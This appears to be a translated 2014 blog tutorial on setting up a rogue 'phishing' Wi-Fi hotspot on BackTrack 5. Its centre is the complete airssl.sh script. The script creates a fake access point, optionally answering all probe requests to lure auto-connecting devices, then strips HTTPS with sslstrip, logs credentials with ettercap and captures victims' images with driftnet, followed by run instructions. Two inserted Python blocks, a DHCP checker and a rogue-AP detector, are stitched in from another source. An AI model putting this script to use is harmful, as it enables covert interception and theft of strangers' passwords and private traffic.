
Setting up a “phishing” hotspot on BackTrack 5 (test)



1. Configure a static IP (optional)

Edit the /etc/network/interfaces file:

auto eth0
iface eth0 inet static
address 192.168.3.100
gateway 192.168.3.1
netmask 255.255.255.0

Reload the network interface:

root@bt:~# /etc/init.d/networking restart

2. Update the package source list, to get around the odd problems that otherwise show up when using apt-get.

First back up the source list:

sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup

Edit /etc/apt/sources.list.

Refresh the package index:

sudo apt-get update

Note: the latest source list is at http://wiki.ubuntu.org.cn/%E6%BA%90%E5%88%97%E8%A1%A8

Or:

(1. Open /etc/apt/sources.list in an editor.
2. Paste the following lines into sources.list, replacing the original content:
deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://64.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing

Finally run apt-get update in a terminal,

then wait, answering YES all the way.)

3. Install sslstrip

Change into the /pentest/web/sslstrip directory and run the install command:

python setup.py install


4. Install and configure DHCP

Install the dhcp3 server: sudo apt-get install dhcp3-server

Configure the dhcp3 service in /etc/dhcp3/dhcpd.conf, adjusting the values to your own network:

subnet 192.168.3.0 netmask 255.255.255.0 {
# keep the pool clear of the server's own address (192.168.3.100 in step 1)
range 192.168.3.60 192.168.3.99;
option domain-name-servers ns1.internal.example.org;
option domain-name "internal.example.org";
option routers 192.168.3.1;
# the broadcast address of a /24 is .255, not .100
option broadcast-address 192.168.3.255;
default-lease-time 600;
max-lease-time 7200;
}

Restart the service: sudo /etc/init.d/dhcp3-server restart

Change the interface the dhcp3 service listens on by editing /etc/default/dhcp3-server:

INTERFACES="eth0"

Use another machine to check that it can obtain an IP address from the DHCP server.
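A subnet declaration that is internally inconsistent (broadcast address inside the pool, pool overlapping the server's own address) is the usual reason "another machine" never gets a lease. The following checker is an added example, not from the post: it parses a constructed copy of the step 4 block (with the broadcast address as the post originally wrote it) and reports the inconsistencies; the same checks apply to the 192.168.232.0 block at the end of the post.

```python
import ipaddress
import re

# Constructed copy of the subnet declaration from step 4 of the post,
# with broadcast-address left exactly as the post wrote it.
DHCPD_CONF = """\
subnet 192.168.3.0 netmask 255.255.255.0 {
range 192.168.3.60 192.168.3.100;
option domain-name-servers ns1.internal.example.org;
option domain-name "internal.example.org";
option routers 192.168.3.1;
option broadcast-address 192.168.3.100;
default-lease-time 600;
max-lease-time 7200;
}
"""

def parse_subnet(conf):
    """Extract the fields we check from the first subnet { ... } block."""
    m = re.search(r"subnet\s+(\S+)\s+netmask\s+(\S+)\s*\{(.*?)\}", conf, re.S)
    assert m, "no subnet declaration found"
    net = ipaddress.ip_network(f"{m.group(1)}/{m.group(2)}", strict=True)
    body = m.group(3)
    def opt(name):  # value of the "<name> <value>;" statement inside the block
        mm = re.search(rf"^\s*{name}\s+([^;]+);", body, re.M)
        return mm.group(1).strip() if mm else ""
    lo, hi = opt("range").split()
    return {"net": net, "lo": ipaddress.ip_address(lo), "hi": ipaddress.ip_address(hi),
            "routers": ipaddress.ip_address(opt("option routers")),
            "broadcast": ipaddress.ip_address(opt("option broadcast-address"))}

def check_subnet(conf, server_ip=None):
    """Return a list of problems; an empty list means the block looks consistent."""
    s = parse_subnet(conf)
    net, lo, hi = s["net"], s["lo"], s["hi"]
    problems = []
    if s["broadcast"] != net.broadcast_address:
        problems.append(f"broadcast-address should be {net.broadcast_address}, not {s['broadcast']}")
    if s["routers"] not in net:
        problems.append(f"routers {s['routers']} is outside {net}")
    if lo not in net or hi not in net or lo > hi:
        problems.append(f"range {lo}-{hi} is not a valid range inside {net}")
    elif lo <= net.network_address or hi >= net.broadcast_address:
        problems.append("range must not include the network or broadcast address")
    if lo <= s["routers"] <= hi:
        problems.append("range includes the router address")
    if server_ip and lo <= ipaddress.ip_address(server_ip) <= hi:
        problems.append(f"range includes the DHCP server's own address {server_ip}")
    return problems
```

Pass the address configured in step 1 as server_ip to catch the pool overlapping the server itself.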

5. Set up the AP hotspot

Create an air folder under root's home directory.

Create a file named airssl.sh in it; the content of airssl.sh is as follows:

#!/bin/bash
# ©opyright 2009 - killadaninja - Modified G60Jon 2010
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

# Network questions
echo
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon "
echo
route -n -A inet | grep UG
echo
echo
echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
read -e gatewayip
echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
read -e internet_interface
echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
read -e fakeap_interface
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"

# Dhcpd creation
mkdir -p "/pentest/wireless/airssl"
echo "authoritative;

default-lease-time 600;
max-lease-time 7200;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.20 10.0.0.50;

}" > /pentest/wireless/airssl/dhcpd.conf

# Fake ap setup
echo "[+] Configuring FakeAP...."
echo
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches? "
echo
echo "Choose Y to see airbase-ng help and add switches. "
echo "Choose N to run airbase-ng in basic mode with your chosen ESSID. "
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your chosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and slave will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
echo "Y, N or A "

read ANSWER

if [ $ANSWER = "y" ] ; then
airbase-ng --help
fi

if [ $ANSWER = "y" ] ; then
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "a" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "n" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

# Tables
echo "[+] Configuring forwarding tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# DHCP
echo "[+] Setting up DHCP..."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
sleep 3

# Sslstrip
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2

# Ettercap
echo "[+] Configuring ettercap..."
echo
echo "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N "
echo "Y or N "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi

if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redefined here.
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
sleep 1
fi

if [ $ETTER = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
sleep 1
fi

# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), "
echo "Y or N "
read DRIFT

if [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3
fi

xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo "[+] Activated..."
echo "Airssl is now running, after slave connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftnetdata "
echo
echo "[+] IMPORTANT..."
echo "After you have finished please close airssl and clean up properly by hitting Y,
if airssl is not closed properly ERRORS WILL OCCUR "
read WISH

# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning up airssl and resetting iptables..."

kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "[+] Clean up successful..."
echo "[+] Thank you for using airssl, Good Bye..."
exit

fi
exit


Make airssl.sh executable:

root@bt:~/air# chmod 777 airssl.sh


Finally, run airssl.sh and supply the inputs it asks for:

root@bt:~/air# ./airssl.sh

Enter the upstream gateway address; for example, mine is 192.168.3.1. Press Enter.

Enter the interface that is connected to the internet; for example, mine is eth0. Press Enter.

Enter the interface to use for the AP hotspot; for example, mine is wlan0. Press Enter.

Enter the ESSID of the AP hotspot, that is, the name of the wireless network you are sharing; for example, mine is youku. Press Enter.

Read the prompt yourself; enter n and press Enter.

This screen appears:

Read the prompt yourself; enter n and press Enter.

Another window appears, for Ettercap.

Read the prompt yourself; enter y and press Enter.

One more window appears, for driftnet.

Test it with a phone.

It can connect to the “youku” wireless network.
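From the defender's side, the network this script brings up is recognisable in a site survey: an ESSID you operate (youku in the walkthrough) advertised from a BSSID that is not yours and without encryption. The following is an added example, not from the post or the airssl script: it reads a constructed, simplified scan listing (four CSV columns, not real airodump-ng output) and flags evil-twin candidates against an assumed inventory of known APs (KNOWN).

```python
import csv
import io

# Constructed scan listing (simplified CSV: BSSID,channel,privacy,ESSID).
# Not real airodump-ng output; the last two rows mimic an open AP brought
# up on channel 1 with a copied ESSID, as the walkthrough's default mode does.
SCAN = """\
00:11:22:33:44:55,6,WPA2,youku
00:11:22:33:44:66,11,WPA2,youku
de:ad:be:ef:00:01,1,OPN,youku
de:ad:be:ef:00:02,1,OPN,CoffeeShop
"""

# Assumed inventory of the networks we operate:
# ESSID -> (legitimate BSSIDs, expected privacy setting)
KNOWN = {"youku": ({"00:11:22:33:44:55", "00:11:22:33:44:66"}, "WPA2")}

def parse_scan(text):
    """Turn the CSV listing into a list of dicts, normalising case and whitespace."""
    rows = []
    for bssid, chan, privacy, essid in csv.reader(io.StringIO(text)):
        rows.append({"bssid": bssid.strip().lower(), "channel": int(chan),
                     "privacy": privacy.strip().upper(), "essid": essid.strip()})
    return rows

def find_rogues(rows, known=KNOWN):
    """Flag APs that advertise one of our ESSIDs from an unknown BSSID or with weaker security."""
    alerts = []
    for r in rows:
        if r["essid"] not in known:
            continue  # a foreign ESSID is not an impersonation of ours
        good_bssids, privacy = known[r["essid"]]
        reasons = []
        if r["bssid"] not in good_bssids:
            reasons.append("unknown BSSID")
        if r["privacy"] != privacy:
            reasons.append(f"privacy {r['privacy']} instead of {privacy}")
        if reasons:
            alerts.append((r["bssid"], r["essid"], r["channel"], "; ".join(reasons)))
    return alerts
```

Export a real scanner's results into the same four columns to run this against a live survey.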

Link: http://pan.baidu.com/s/1c05vHM4

Password: 4h3


Supplement:

Enable wireless monitor mode: airmon-ng start wlan0

Package sources:

# just copy the following lines in
deb http://mirrors.ustc.edu.cn/kali kali main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali main non-free contrib
deb http://mirrors.ustc.edu.cn/kali-security kali/updates main contrib non-free
# then import the public key
sudo apt-key adv --keyserver pgp.mit.edu --recv-keys ED444FF07D8D0BF6
# then update
apt-get update

The above is the USTC (University of Science and Technology of China) mirror.

Below is a list of package sources.

USTC mirror

deb http://mirrors.ustc.edu.cn/kali kali main non-free contrib 
deb-src http://mirrors.ustc.edu.cn/kali kali main non-free contrib 
deb http://mirrors.ustc.edu.cn/kali-security kali/updates main contrib non-free


Official Kali source:
deb http://http.kali.org/kali kali main non-free contrib 
deb-src http://http.kali.org/kali kali main non-free contrib 
deb http://security.kali.org/kali-security kali/updates main contrib non-free


Kali Singapore mirror:
deb http://mirror.nus.edu.sg/kali/kali/ kali main non-free contrib 
deb-src http://mirror.nus.edu.sg/kali/kali/ kali main non-free contrib 
deb http://security.kali.org/kali-security kali/updates main contrib non-free 
deb http://mirror.nus.edu.sg/kali/kali-security kali/updates main contrib non-free 
deb-src http://mirror.nus.edu.sg/kali/kali-security kali/updates main contrib non-free


Kali domestic (China) mirrors:
deb http://ftp.sjtu.edu.cn/debian wheezy main non-free contrib 
deb-src http://ftp.sjtu.edu.cn/debian wheezy main non-free contrib 
deb http://ftp.sjtu.edu.cn/debian wheezy-proposed-updates main non-free contrib 
deb-src http://ftp.sjtu.edu.cn/debian wheezy-proposed-updates main non-free contrib 
deb http://ftp.sjtu.edu.cn/debian-security wheezy/updates main non-free contrib 
deb-src http://ftp.sjtu.edu.cn/debian-security wheezy/updates main non-free contrib 
deb http://mirrors.163.com/debian wheezy main non-free contrib 
deb-src http://mirrors.163.com/debian wheezy main non-free contrib 
deb http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib 
deb-src http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib
deb-src http://mirrors.163.com/debian-security wheezy/updates main non-free contrib 
deb http://mirrors.163.com/debian-security wheezy/updates main non-free contrib

It is best to use the USTC mirror or one of the domestic mirrors!

eth0:inet addr:192.168.138.129   bcast:192.168.138.255  mask:255.255.255.0

subnet 192.168.232.0 netmask 255.255.255.0 {
# .255 is the broadcast address and cannot be leased; end the pool at .254
range 192.168.232.60 192.168.232.254;
option domain-name-servers ns1.internal.example.org;
option domain-name "internal.example.org";
option routers 192.168.232.2;
option broadcast-address 192.168.232.255;
default-lease-time 600;
max-lease-time 7200;
}

Category: Learning and exchange | Published by: admin | Views: | Posted: 2014/10/31
Original article; if reproduced, please credit: reproduced from the personal information site http://www.zhangxinran.com/
Link to this article: http://www.zhangxinran.com/post/1106.html
